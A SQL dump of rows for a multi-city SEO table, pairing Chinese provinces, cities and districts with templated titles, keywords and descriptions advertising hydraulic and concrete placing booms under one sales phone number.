INSERT INTO `ey_weapp_multicity` VALUES ('36', '21', '21', '苏州市', '2', '1', '0', 'suzhoushi', '苏州液压布料机厂家', '苏州布料机价格,苏州液压布料机,苏州液压布料机厂家', '苏州布料机专业生产厂家联系电话:17858811257', '100', '1655078636', '1655085619');
INSERT INTO `ey_weapp_multicity` VALUES ('37', '21', '21', '南通市', '2', '1', '0', 'nantongshi', '南通混凝土布料机厂家', '南通混凝土布料机价格,南通混凝土布料机,南通混凝土布料机厂家', '南通混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655078656', '1655085015');
INSERT INTO `ey_weapp_multicity` VALUES ('38', '21', '21', '连云港市', '2', '1', '0', 'lianyungang', '连云港液压布料机厂家', '连云港布料机价格,连云港液压布料机,连云港液压布料机厂家', '连云港布料机专业生产厂家联系电话:17858811257', '100', '1655079160', '1655085085');
INSERT INTO `ey_weapp_multicity` VALUES ('39', '28', '28', '黄浦区', '3', '1', '0', 'hp', '黄浦区液压布料机厂家', '黄浦区布料机价格,黄浦区液压布料机,黄浦区液压布料机厂家', '黄浦区布料机专业生产厂家联系电话:17858811257', '100', '1655085561', '1655085561');
INSERT INTO `ey_weapp_multicity` VALUES ('40', '28', '28', '徐汇区', '3', '1', '0', 'xhq', '徐汇区混凝土布料机厂家', '徐汇混凝土布料机价格,徐汇混凝土布料机,徐汇混凝土布料机厂家', '徐汇区混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655085936', '1655085936');
INSERT INTO `ey_weapp_multicity` VALUES ('41', '28', '28', '长宁区', '3', '1', '0', 'clq', '长宁区液压布料机厂家', '长宁区布料机价格,长宁区液压布料机,长宁区液压布料机厂家', '长宁区布料机专业生产厂家联系电话:17858811257', '100', '1655086068', '1655086068');
INSERT INTO `ey_weapp_multicity` VALUES ('42', '28', '28', '静安区', '3', '1', '0', 'jaq', '静安区液压布料机厂家', '静安区布料机价格,静安区液压布料机,静安区液压布料机厂家', '静安区布料机专业生产厂家联系电话:17858811257', '100', '1655086482', '1655086482');
INSERT INTO `ey_weapp_multicity` VALUES ('43', '28', '28', '普陀区', '3', '1', '0', 'ptq', '普陀区液压布料机厂家', '普陀区布料机价格,普陀区液压布料机,普陀区液压布料机厂家', '普陀区布料机专业生产厂家联系电话:17858811257', '100', '1655086643', '1655086643');
INSERT INTO `ey_weapp_multicity` VALUES ('44', '28', '28', '虹口区', '3', '1', '0', 'hkq', '虹口区液压布料机厂家', '虹口区布料机价格,虹口区液压布料机,虹口区液压布料机厂家', '虹口区布料机专业生产厂家联系电话:17858811257', '100', '1655088752', '1655088752');
INSERT INTO `ey_weapp_multicity` VALUES ('47', '28', '28', '杨浦区', '3', '1', '0', 'yp', '杨浦区混凝土布料机厂家', '杨浦区混凝土布料机价格,杨浦区混凝土布料机,杨浦区混凝土布料机厂家', '杨浦区混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655089323', '1655089323');
INSERT INTO `ey_weapp_multicity` VALUES ('46', '28', '28', '浦东新区', '3', '1', '0', 'ptxq', '浦东新区液压布料机厂家', '浦东新区布料机价格,浦东新区液压布料机,浦东新区液压布料机厂家', '浦东新区布料机专业生产厂家联系电话:17858811257', '100', '1655089160', '1655089160');
INSERT INTO `ey_weapp_multicity` VALUES ('48', '28', '28', '闵行区', '3', '1', '0', 'mhq', '闵行区液压布料机厂家', '闵行区布料机价格,闵行区液压布料机,闵行区液压布料机厂家', '闵行区布料机专业生产厂家联系电话:17858811257', '100', '1655089457', '1655089457');
INSERT INTO `ey_weapp_multicity` VALUES ('49', '28', '28', '宝山区', '3', '1', '0', 'bsq', '宝山区混凝土布料机厂家', '宝山区混凝土布料机价格,宝山区混凝土布料机,宝山区混凝土布料机厂家', '宝山区混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655089724', '1655089724');
INSERT INTO `ey_weapp_multicity` VALUES ('50', '28', '28', '嘉定区', '3', '1', '0', 'jdq', '嘉定区液压布料机厂家', '嘉定区布料机价格,嘉定区液压布料机,嘉定区液压布料机厂家', '嘉定区布料机专业生产厂家联系电话:17858811257', '100', '1655089836', '1655089836');
INSERT INTO `ey_weapp_multicity` VALUES ('51', '28', '28', '金山区', '3', '1', '0', 'jsq', '金山区液压布料机厂家', '金山区布料机价格,金山区液压布料机,金山区液压布料机厂家', '金山区布料机专业生产厂家联系电话:17858811257', '100', '1655089938', '1655089938');
INSERT INTO `ey_weapp_multicity` VALUES ('52', '28', '28', '松江区', '3', '1', '0', 'sjq', '松江区液压布料机厂家', '松江区布料机价格,松江区液压布料机,松江区液压布料机厂家', '松江区布料机专业生产厂家联系电话:17858811257', '100', '1655090045', '1655090045');
INSERT INTO `ey_weapp_multicity` VALUES ('53', '28', '28', '青浦区', '3', '1', '0', 'qpq', '青浦区混凝土布料机厂家', '青浦区混凝土布料机价格,青浦区混凝土布料机,青浦区混凝土布料机厂家', '青浦区混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655090322', '1655090322');
INSERT INTO `ey_weapp_multicity` VALUES ('54', '28', '28', '奉贤区', '3', '1', '0', 'fxq', '奉贤区混凝土布料机厂家', '奉贤区混凝土布料机价格,奉贤区混凝土布料机,奉贤区混凝土布料机厂家', '奉贤区混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655090427', '1655090427');
INSERT INTO `ey_weapp_multicity` VALUES ('55', '28', '28', '崇明区', '3', '1', '0', 'cmq', '崇明区混凝土布料机厂家', '崇明区混凝土布料机价格,崇明区混凝土布料机,崇明区混凝土布料机厂家', '崇明区混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655090489', '1655090489');
INSERT INTO `ey_weapp_multicity` VALUES ('56', '21', '21', '淮安', '2', '1', '0', 'wa', '淮安市混凝土布料机厂家', '淮安市混凝土布料机价格,淮安市混凝土布料机,淮安市混凝土布料机厂家', '淮安市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655097935', '1655097935');
INSERT INTO `ey_weapp_multicity` VALUES ('57', '21', '21', '盐城市', '2', '1', '0', 'yc', '盐城市液压布料机厂家', '盐城市布料机价格,盐城市液压布料机,盐城市液压布料机厂家', '盐城市布料机专业生产厂家联系电话:17858811257', '100', '1655098121', '1655098121');
INSERT INTO `ey_weapp_multicity` VALUES ('58', '21', '21', '扬州市', '2', '1', '0', 'yzs', '扬州市混凝土布料机厂家', '扬州市混凝土布料机价格,扬州市混凝土布料机,扬州市混凝土布料机厂家', '扬州市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655098232', '1655098232');
INSERT INTO `ey_weapp_multicity` VALUES ('59', '21', '21', '镇江市', '2', '1', '0', 'zjs', '镇江市液压布料机厂家', '镇江市混凝土布料机价格,镇江市混凝土布料机,镇江市混凝土布料机厂家', '镇江市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655098309', '1655098309');
INSERT INTO `ey_weapp_multicity` VALUES ('60', '21', '21', '泰州市', '2', '1', '0', 'tzs', '泰州市混凝土布料机厂家', '泰州市混凝土布料机价格,泰州市混凝土布料机,泰州市混凝土布料机厂家', '泰州市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655098436', '1655098436');
INSERT INTO `ey_weapp_multicity` VALUES ('61', '21', '21', '宿迁市', '2', '1', '0', 'sqs', '宿迁市液压布料机厂家', '宿迁市布料机价格,宿迁市液压布料机,宿迁市液压布料机厂家', '宿迁市布料机专业生产厂家联系电话:17858811257', '100', '1655098681', '1655098681');
INSERT INTO `ey_weapp_multicity` VALUES ('62', '0', '0', '浙江省', '1', '1', '0', 'zj', '浙江省液压布料机厂家', '浙江省布料机价格,浙江省液压布料机,浙江省液压布料机厂家', '浙江省布料机专业生产厂家联系电话:17858811257', '100', '1655098805', '1655100142');
INSERT INTO `ey_weapp_multicity` VALUES ('63', '62', '62', '杭州市', '2', '1', '0', 'hzs', '杭州市混凝土布料机厂家', '杭州市混凝土布料机价格,杭州市混凝土布料机,杭州市混凝土布料机厂家', '杭州市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655100230', '1655100230');
INSERT INTO `ey_weapp_multicity` VALUES ('64', '62', '62', '宁波市', '2', '1', '0', 'nbs', '宁波市液压布料机厂家', '宁波市布料机价格,宁波市液压布料机,宁波市液压布料机厂家', '宁波市布料机专业生产厂家联系电话:17858811257', '100', '1655101124', '1655101124');
INSERT INTO `ey_weapp_multicity` VALUES ('65', '62', '62', '温州市', '2', '1', '0', 'wzs', '温州市液压布料机厂家', '温州市布料机价格,温州市液压布料机,温州市液压布料机厂家', '温州市布料机专业生产厂家联系电话:17858811257', '100', '1655101203', '1655101203');
INSERT INTO `ey_weapp_multicity` VALUES ('66', '62', '62', '嘉兴市', '2', '1', '0', 'jxs', '嘉兴市混凝土布料机厂家', '嘉兴市混凝土布料机价格,嘉兴市混凝土布料机,嘉兴市混凝土布料机厂家', '嘉兴市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655101307', '1655101307');
INSERT INTO `ey_weapp_multicity` VALUES ('67', '62', '62', '湖州市', '2', '1', '0', 'huzs', '湖州市液压布料机厂家', '湖州市布料机价格,湖州市液压布料机,湖州市液压布料机厂家', '湖州市布料机专业生产厂家联系电话:17858811257', '100', '1655101600', '1655101600');
INSERT INTO `ey_weapp_multicity` VALUES ('68', '62', '62', '绍兴市', '2', '1', '0', 'sxs', '绍兴市混凝土布料机厂家', '绍兴市混凝土布料机价格,绍兴市混凝土布料机,绍兴市混凝土布料机厂家', '绍兴市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655102448', '1655102448');
INSERT INTO `ey_weapp_multicity` VALUES ('69', '62', '62', '金华市', '2', '1', '0', 'jhs', '金华市液压布料机厂家', '金华市布料机价格,金华市液压布料机,金华市液压布料机厂家', '金华市布料机专业生产厂家联系电话:17858811257', '100', '1655102558', '1655102558');
INSERT INTO `ey_weapp_multicity` VALUES ('70', '62', '62', '衢州市', '2', '1', '0', 'qzs', '衢州市混凝土布料机厂家', '衢州市混凝土布料机价格,衢州市混凝土布料机,衢州市混凝土布料机厂家', '衢州市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655102650', '1655102650');
INSERT INTO `ey_weapp_multicity` VALUES ('71', '62', '62', '舟山市', '2', '1', '0', 'zss', '舟山市液压布料机厂家', '舟山市布料机价格,舟山市液压布料机,舟山市液压布料机厂家', '舟山市布料机专业生产厂家联系电话:17858811257', '100', '1655102723', '1655102723');
INSERT INTO `ey_weapp_multicity` VALUES ('72', '62', '62', '台州市', '2', '1', '0', 'tz', '台州市液压布料机厂家', '台州市布料机价格,台州市液压布料机,台州市液压布料机厂家', '台州市布料机专业生产厂家联系电话:17858811257', '100', '1655102796', '1655102796');
INSERT INTO `ey_weapp_multicity` VALUES ('73', '62', '62', '丽水市', '2', '1', '0', 'ls', '丽水市混凝土布料机厂家', '丽水市混凝土布料机价格,丽水市混凝土布料机,丽水市混凝土布料机厂家', '丽水市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655102871', '1655102871');
INSERT INTO `ey_weapp_multicity` VALUES ('74', '32', '32', '马鞍山市', '2', '1', '0', 'mas', '马鞍山市混凝土布料机厂家', '马鞍山市混凝土布料机价格,马鞍山市混凝土布料机,马鞍山市混凝土布料机厂家', '马鞍山市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655103721', '1655103762');
INSERT INTO `ey_weapp_multicity` VALUES ('75', '32', '32', '淮北市', '2', '1', '0', 'hb', '淮北市液压布料机厂家', '淮北市布料机价格,淮北市液压布料机,淮北市液压布料机厂家', '淮北市布料机专业生产厂家联系电话:17858811257', '100', '1655103919', '1655103961');
INSERT INTO `ey_weapp_multicity` VALUES ('76', '32', '32', '宿州市', '2', '1', '0', 'sz', '宿州市液压布料机厂家', '宿州市布料机价格,宿州市液压布料机,宿州市液压布料机厂家', '宿州市布料机专业生产厂家联系电话:17858811257', '100', '1655104042', '1655104042');
INSERT INTO `ey_weapp_multicity` VALUES ('77', '32', '32', '阜阳市', '2', '1', '0', 'fys', '阜阳市混凝土布料机厂家', '阜阳市混凝土布料机价格,阜阳市混凝土布料机,阜阳市混凝土布料机厂家', '阜阳市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655105710', '1655105710');
INSERT INTO `ey_weapp_multicity` VALUES ('78', '32', '32', '蚌埠市', '2', '1', '0', 'bbs', '蚌埠市液压布料机厂家', '蚌埠市布料机价格,蚌埠市液压布料机,蚌埠市液压布料机厂家', '蚌埠市布料机专业生产厂家联系电话:17858811257', '100', '1655106025', '1655106025');
INSERT INTO `ey_weapp_multicity` VALUES ('79', '32', '32', '淮南市', '2', '1', '0', 'hns', '淮南市混凝土布料机厂家', '淮南市混凝土布料机价格,淮南市混凝土布料机,淮南市混凝土布料机厂家', '淮南市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655106118', '1655106118');
INSERT INTO `ey_weapp_multicity` VALUES ('80', '32', '32', '滁州市', '2', '1', '0', 'czs', '滁州市混凝土布料机厂家', '滁州市混凝土布料机价格,滁州市混凝土布料机,滁州市混凝土布料机厂家', '滁州市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655106243', '1655106243');
INSERT INTO `ey_weapp_multicity` VALUES ('81', '32', '32', '六安市', '2', '1', '0', 'las', '六安市液压布料机厂家', '六安市布料机价格,六安市液压布料机,六安市液压布料机厂家', '六安市布料机专业生产厂家联系电话:17858811257', '100', '1655106328', '1655106328');
INSERT INTO `ey_weapp_multicity` VALUES ('82', '32', '32', '巢湖市', '2', '1', '0', 'chs', '巢湖市混凝土布料机厂家', '巢湖市混凝土布料机价格,巢湖市混凝土布料机,巢湖市混凝土布料机厂家', '巢湖市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655106705', '1655106705');
INSERT INTO `ey_weapp_multicity` VALUES ('83', '32', '32', '芜湖市', '2', '1', '0', 'whs', '芜湖市混凝土布料机厂家', '芜湖市混凝土布料机价格,芜湖市混凝土布料机,芜湖市混凝土布料机厂家', '芜湖市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655106846', '1655106846');
INSERT INTO `ey_weapp_multicity` VALUES ('84', '32', '32', '亳州市', '2', '1', '0', 'hz', '亳州市混凝土布料机厂家', '亳州市混凝土布料机价格,亳州市混凝土布料机,亳州市混凝土布料机厂家', '亳州市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655106978', '1655106978');
INSERT INTO `ey_weapp_multicity` VALUES ('85', '32', '32', '安庆市', '2', '1', '0', 'aqs', '安庆市液压布料机厂家', '安庆市布料机价格,安庆市液压布料机,安庆市液压布料机厂家', '安庆市布料机专业生产厂家联系电话:17858811257', '100', '1655107049', '1655107049');
INSERT INTO `ey_weapp_multicity` VALUES ('86', '32', '32', '池州市', '2', '1', '0', 'cz', '池州市液压布料机厂家', '池州市布料机价格,池州市液压布料机,池州市液压布料机厂家', '池州市布料机专业生产厂家联系电话:17858811257', '100', '1655107131', '1655107131');
INSERT INTO `ey_weapp_multicity` VALUES ('87', '32', '32', '铜陵市', '2', '1', '0', 'tls', '铜陵市混凝土布料机厂家', '铜陵市混凝土布料机价格,铜陵市混凝土布料机,铜陵市混凝土布料机厂家', '铜陵市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655107636', '1655107636');
INSERT INTO `ey_weapp_multicity` VALUES ('88', '32', '32', '宣城市', '2', '1', '0', 'xcs', '宣城市液压布料机厂家', '宣城市布料机价格,宣城市液压布料机,宣城市液压布料机厂家', '宣城市布料机专业生产厂家联系电话:17858811257', '100', '1655107718', '1655107718');
INSERT INTO `ey_weapp_multicity` VALUES ('89', '32', '32', '黄山市', '2', '1', '0', 'hss', '黄山市液压布料机厂家', '黄山市布料机价格,黄山市液压布料机,黄山市液压布料机厂家', '黄山市布料机专业生产厂家联系电话:17858811257', '100', '1655107885', '1655107885');
INSERT INTO `ey_weapp_multicity` VALUES ('90', '0', '0', '广东省', '1', '1', '0', 'gds', '广东省液压布料机厂家', '广东省布料机价格,广东省液压布料机,广东省液压布料机厂家', '广东省布料机专业生产厂家联系电话:17858811257', '100', '1655108165', '1655108165');
INSERT INTO `ey_weapp_multicity` VALUES ('91', '90', '90', '广州市', '2', '1', '0', 'gzs', '广州液压布料机厂家', '广州布料机价格,广州液压布料机,广州液压布料机厂家', '广州布料机专业生产厂家联系电话:17858811257', '100', '1655108235', '1655108235');
INSERT INTO `ey_weapp_multicity` VALUES ('92', '90', '90', '深圳市', '2', '1', '0', 'szs', '深圳市混凝土布料机厂家', '深圳市混凝土布料机价格,深圳市混凝土布料机,深圳市混凝土布料机厂家', '深圳市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655108360', '1655108360');
INSERT INTO `ey_weapp_multicity` VALUES ('93', '90', '90', '珠海市', '2', '1', '0', 'zhs', '珠海市液压布料机厂家', '珠海市布料机价格,珠海市液压布料机,珠海市液压布料机厂家', '珠海市布料机专业生产厂家联系电话:17858811257', '100', '1655108491', '1655108491');
INSERT INTO `ey_weapp_multicity` VALUES ('94', '90', '90', '汕头市', '2', '1', '0', 'sts', '汕头市混凝土布料机厂家', '汕头市混凝土布料机价格,汕头市混凝土布料机,汕头市混凝土布料机厂家', '汕头市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655109162', '1655109162');
INSERT INTO `ey_weapp_multicity` VALUES ('95', '90', '90', '佛山市', '2', '1', '0', 'fss', '佛山液压布料机厂家', '佛山布料机价格,佛山液压布料机,佛山液压布料机厂家', '佛山布料机专业生产厂家联系电话:17858811257', '100', '1655109448', '1655109448');
INSERT INTO `ey_weapp_multicity` VALUES ('96', '90', '90', '韶关市', '2', '1', '0', 'sgs', '韶关混凝土布料机厂家', '韶关混凝土布料机价格,韶关混凝土布料机,韶关混凝土布料机厂家', '韶关混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655109637', '1655109637');
INSERT INTO `ey_weapp_multicity` VALUES ('97', '90', '90', '湛江市', '2', '1', '0', 'zanj', '湛江液压布料机厂家', '湛江布料机价格,湛江液压布料机,湛江液压布料机厂家', '湛江布料机专业生产厂家联系电话:17858811257', '100', '1655109903', '1655109903');
INSERT INTO `ey_weapp_multicity` VALUES ('98', '90', '90', '肇庆市', '2', '1', '0', 'zqs', '肇庆市混凝土布料机厂家', '肇庆市混凝土布料机价格,肇庆市混凝土布料机,肇庆市混凝土布料机厂家', '肇庆市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655167284', '1655167284');
INSERT INTO `ey_weapp_multicity` VALUES ('99', '90', '90', '江门市', '2', '1', '0', 'jms', '江门市液压布料机厂家', '江门布料机价格,江门液压布料机,江门液压布料机厂家', '江门布料机专业生产厂家联系电话:17858811257', '100', '1655168283', '1655168283');
INSERT INTO `ey_weapp_multicity` VALUES ('100', '90', '90', '茂名市', '2', '1', '0', 'mms', '茂名市混凝土布料机厂家', '茂名混凝土布料机价格,茂名混凝土布料机,茂名混凝土布料机厂家', '茂名混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655168887', '1655168887');
INSERT INTO `ey_weapp_multicity` VALUES ('101', '90', '90', '惠州市', '2', '1', '0', 'huz', '惠州市液压布料机厂家', '惠州布料机价格,惠州液压布料机,惠州液压布料机厂家\r\n', '惠州布料机专业生产厂家联系电话:17858811257', '100', '1655168978', '1655168978');
INSERT INTO `ey_weapp_multicity` VALUES ('102', '90', '90', '梅州市', '2', '1', '0', 'mzs', '梅州市混凝土布料机厂家', '梅州市混凝土布料机价格,梅州混凝土布料机,梅州混凝土布料机厂家', '梅州市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655170606', '1655170606');
INSERT INTO `ey_weapp_multicity` VALUES ('103', '90', '90', '汕尾市', '2', '1', '0', 'sw', '汕尾市液压布料机厂家', '汕尾布料机价格,汕尾液压布料机,汕尾液压布料机厂家', '汕尾市布料机专业生产厂家联系电话:17858811257', '100', '1655170776', '1655170776');
INSERT INTO `ey_weapp_multicity` VALUES ('105', '90', '90', '河源市', '2', '1', '0', 'hy', '河源市液压布料机厂家', '河源布料机价格,河源液压布料机,河源液压布料机厂家', '河源布料机专业生产厂家联系电话:17858811257', '100', '1655171593', '1655171593');
INSERT INTO `ey_weapp_multicity` VALUES ('106', '90', '90', '阳江市', '2', '1', '0', 'yjs', '阳江混凝土布料机厂家', '阳江混凝土布料机价格,阳江混凝土布料机,阳江混凝土布料机厂家', '阳江混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655172208', '1655172208');
INSERT INTO `ey_weapp_multicity` VALUES ('107', '90', '90', '清远市', '2', '1', '0', 'qy', '清远混凝土布料机厂家', '清远混凝土布料机价格,清远混凝土布料机,清远混凝土布料机厂家', '清远混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655172272', '1655172272');
INSERT INTO `ey_weapp_multicity` VALUES ('108', '90', '90', '东莞市', '2', '1', '0', 'dgs', '东莞市混凝土布料机厂家', '东莞市混凝土布料机价格,东莞市混凝土布料机,东莞市混凝土布料机厂家', '东莞市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655172584', '1655172584');
INSERT INTO `ey_weapp_multicity` VALUES ('109', '90', '90', '中山市', '2', '1', '0', 'zs', '中山市液压布料机厂家', '中山市布料机价格,中山市液压布料机,中山市液压布料机厂家', '中山市布料机专业生产厂家联系电话:17858811257', '100', '1655172657', '1655172657');
INSERT INTO `ey_weapp_multicity` VALUES ('110', '90', '90', '潮州市', '2', '1', '0', 'caz', '潮州市混凝土布料机厂家', '潮州混凝土布料机价格,潮州混凝土布料机,潮州混凝土布料机厂家', '潮州混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655172723', '1655172723');
INSERT INTO `ey_weapp_multicity` VALUES ('111', '90', '90', '揭阳市', '2', '1', '0', 'jys', '揭阳市液压布料机厂家', '揭阳市布料机价格,揭阳市液压布料机,揭阳市液压布料机厂家', '揭阳市布料机专业生产厂家联系电话:17858811257', '100', '1655172787', '1655172787');
INSERT INTO `ey_weapp_multicity` VALUES ('112', '90', '90', '云浮市', '2', '1', '0', 'yfs', '云浮市混凝土布料机厂家', '云浮市混凝土布料机价格,云浮市混凝土布料机,云浮市混凝土布料机厂家', '云浮市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655172854', '1655172854');
INSERT INTO `ey_weapp_multicity` VALUES ('113', '0', '0', '天津市', '1', '1', '0', 'tjs', '天津市液压布料机厂家', '天津市布料机价格,天津市液压布料机,天津市液压布料机厂家', '天津市布料机专业生产厂家联系电话:17858811257', '100', '1655173208', '1655173208');
INSERT INTO `ey_weapp_multicity` VALUES ('114', '0', '0', '重庆市', '1', '1', '0', 'cqs', '重庆市混凝土布料机厂家', '重庆市混凝土布料机价格,重庆市混凝土布料机,重庆市混凝土布料机厂家', '重庆市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655173272', '1655173272');
INSERT INTO `ey_weapp_multicity` VALUES ('115', '0', '0', '湖北省', '1', '1', '0', 'hbs', '湖北省液压布料机厂家', '湖北省布料机价格,湖北省液压布料机,湖北省液压布料机厂家', '湖北省布料机专业生产厂家联系电话:17858811257', '100', '1655173362', '1655173362');
INSERT INTO `ey_weapp_multicity` VALUES ('116', '115', '115', '武汉市', '2', '1', '0', 'wh', '武汉市混凝土布料机厂家', '武汉市混凝土布料机价格,武汉市混凝土布料机,武汉市混凝土布料机厂家', '武汉市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655173574', '1655173574');
INSERT INTO `ey_weapp_multicity` VALUES ('118', '115', '115', '黄石市', '2', '1', '0', 'hs', '黄石市混凝土布料机厂家', '黄石市混凝土布料机价格,黄石市混凝土布料机,黄石市混凝土布料机厂家', '黄石市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655176082', '1655176082');
INSERT INTO `ey_weapp_multicity` VALUES ('119', '115', '115', '十堰市', '2', '1', '0', 'sy', '十堰市液压布料机厂家', '十堰布料机价格,十堰液压布料机,十堰液压布料机厂家', '十堰布料机专业生产厂家联系电话:17858811257', '100', '1655176138', '1655176138');
INSERT INTO `ey_weapp_multicity` VALUES ('120', '115', '115', '宜昌市', '2', '1', '0', 'ycs', '宜昌混凝土布料机厂家', '宜昌混凝土布料机价格,宜昌混凝土布料机,宜昌混凝土布料机厂家', '宜昌混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655183905', '1655183905');
INSERT INTO `ey_weapp_multicity` VALUES ('121', '115', '115', '襄阳市', '2', '1', '0', 'xys', '襄阳市液压布料机厂家', '襄阳市布料机价格,襄阳市液压布料机,襄阳市液压布料机厂家', '襄阳市布料机专业生产厂家联系电话:17858811257', '100', '1655183999', '1655183999');
INSERT INTO `ey_weapp_multicity` VALUES ('122', '115', '115', '鄂州市', '2', '1', '0', 'ezs', '鄂州市混凝土布料机厂家', '鄂州混凝土布料机价格,鄂州混凝土布料机,鄂州混凝土布料机厂家', '鄂州混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655184167', '1655184167');
INSERT INTO `ey_weapp_multicity` VALUES ('123', '115', '115', '荆门市', '2', '1', '0', 'jm', '荆门市液压布料机厂家', '荆门布料机价格,荆门液压布料机,荆门液压布料机厂家', '荆门布料机专业生产厂家联系电话:17858811257', '100', '1655184839', '1655184839');
INSERT INTO `ey_weapp_multicity` VALUES ('124', '115', '115', '孝感市', '2', '1', '0', 'xgs', '孝感市混凝土布料机厂家', '孝感混凝土布料机价格,孝感混凝土布料机,孝感混凝土布料机厂家', '孝感混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655185032', '1655185032');
INSERT INTO `ey_weapp_multicity` VALUES ('125', '115', '115', '荆州市', '2', '1', '0', 'jz', '荆州混凝土布料机厂家', '荆州混凝土布料机价格,荆州混凝土布料机,荆州混凝土布料机厂家', '荆州混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655185133', '1655185133');
INSERT INTO `ey_weapp_multicity` VALUES ('126', '115', '115', '黄冈市', '2', '1', '0', 'hgs', '黄冈液压布料机厂家', '黄冈布料机价格,黄冈液压布料机,黄冈液压布料机厂家', '黄冈布料机专业生产厂家联系电话:17858811257', '100', '1655185212', '1655185581');
INSERT INTO `ey_weapp_multicity` VALUES ('127', '115', '115', '咸宁市', '2', '1', '0', 'xn', '咸宁市混凝土布料机厂家', '咸宁市混凝土布料机价格,咸宁市混凝土布料机,咸宁市混凝土布料机厂家', '咸宁市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655185272', '1655185272');
INSERT INTO `ey_weapp_multicity` VALUES ('128', '115', '115', '随州市', '2', '1', '0', 'suz', '随州市液压布料机厂家', '随州市布料机价格,随州市液压布料机,随州市液压布料机厂家', '随州市布料机专业生产厂家联系电话:17858811257', '100', '1655185901', '1655185901');
INSERT INTO `ey_weapp_multicity` VALUES ('129', '115', '115', '恩施土家族苗族自治州', '2', '1', '0', 'es', '恩施土家族苗族自治州液压布料机厂家', '恩施土家族苗族自治州布料机价格,恩施土家族苗族自治州液压布料机,恩施土家族苗族自治州液压布料机厂家', '恩施土家族苗族自治州布料机专业生产厂家联系电话:17858811257', '100', '1655185990', '1655185990');
INSERT INTO `ey_weapp_multicity` VALUES ('130', '0', '0', '河南省', '1', '1', '0', 'hn', '河南省液压布料机厂家', '河南省布料机价格,河南省液压布料机,河南省液压布料机厂家', '河南省布料机专业生产厂家联系电话:17858811257', '100', '1655186157', '1655186157');
INSERT INTO `ey_weapp_multicity` VALUES ('131', '130', '130', '郑州市', '2', '1', '0', 'zz', '郑州市混凝土布料机厂家', '郑州市混凝土布料机价格,郑州市混凝土布料机,郑州市混凝土布料机厂家', '郑州市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655186220', '1655186220');
INSERT INTO `ey_weapp_multicity` VALUES ('132', '130', '130', '开封市', '2', '1', '0', 'kf', '开封市液压布料机厂家', '开封市布料机价格,开封市液压布料机,开封市液压布料机厂家', '开封市布料机专业生产厂家联系电话:17858811257', '100', '1655186315', '1655186315');
INSERT INTO `ey_weapp_multicity` VALUES ('133', '130', '130', '洛阳市', '2', '1', '0', 'ly', '洛阳市液压布料机厂家', '洛阳市布料机价格,洛阳市液压布料机,洛阳市液压布料机厂家', '洛阳市布料机专业生产厂家联系电话:17858811257', '100', '1655186399', '1655186399');
INSERT INTO `ey_weapp_multicity` VALUES ('134', '130', '130', '平顶山市', '2', '1', '0', 'pdss', '平顶山市液压布料机厂家', '平顶山市布料机价格,平顶山市液压布料机,平顶山市液压布料机厂家', '平顶山市布料机专业生产厂家联系电话:17858811257', '100', '1655191816', '1655191816');
INSERT INTO `ey_weapp_multicity` VALUES ('135', '130', '130', '焦作市', '2', '1', '0', 'jzs', '焦作市混凝土布料机厂家', '焦作市混凝土布料机价格,焦作市混凝土布料机,焦作市混凝土布料机厂家', '焦作市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655191941', '1655191941');
INSERT INTO `ey_weapp_multicity` VALUES ('136', '130', '130', '鹤壁市', '2', '1', '0', 'hebi', '鹤壁市液压布料机厂家', '鹤壁市布料机价格,鹤壁市液压布料机,鹤壁市液压布料机厂家', '鹤壁市布料机专业生产厂家联系电话:17858811257', '100', '1655192147', '1655192147');
INSERT INTO `ey_weapp_multicity` VALUES ('137', '130', '130', '新乡市', '2', '1', '0', 'xxs', '新乡市混凝土布料机厂家', '新乡市混凝土布料机价格,新乡市混凝土布料机,新乡市混凝土布料机厂家', '新乡市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655192225', '1655192225');
INSERT INTO `ey_weapp_multicity` VALUES ('138', '130', '130', '安阳市', '2', '1', '0', 'ays', '安阳市液压布料机厂家', '安阳市布料机价格,安阳市液压布料机,安阳市液压布料机厂家', '安阳市布料机专业生产厂家联系电话:17858811257', '100', '1655192342', '1655192342');
